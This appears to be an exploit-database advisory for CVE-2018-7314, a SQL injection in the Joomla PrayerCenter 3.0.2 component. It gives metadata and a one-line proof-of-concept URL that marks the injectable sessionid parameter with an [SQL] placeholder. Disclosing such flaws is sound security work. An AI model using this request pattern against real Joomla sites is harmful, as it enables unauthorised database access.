Joomla! PrayerCenter 3.0.2 SQL Injection

Related Vulnerabilities: CVE-2018-7314  
Publish Date: 23 Feb 2018
Author: Ihsan Sencan
                							

                # # # #
# Exploit Title: Joomla! Component PrayerCenter 3.0.2 - SQL Injection
# Dork: N/A
# Date: 22.02.2018
# Vendor Homepage: http://www.mlwebtechnologies.com/
# Software Link: https://extensions.joomla.org/extensions/extension/living/religion/prayercenter/
# Software Download: http://mlwebtechnologies.github.io/PrayerCenter/
# Software Download: https://github.com/MLWebTechnologies/PrayerCenter/releases/download/3.0.2/PrayerCenter302Unzip1st.zip
# Version: 3.0.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-7314
# # # #
# Exploit Author: Ihsan Sencan
# # # #
# 
# POC: 
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_prayercenter&task=confirm&id=1&sessionid=[SQL]
# 
# # # #
<p>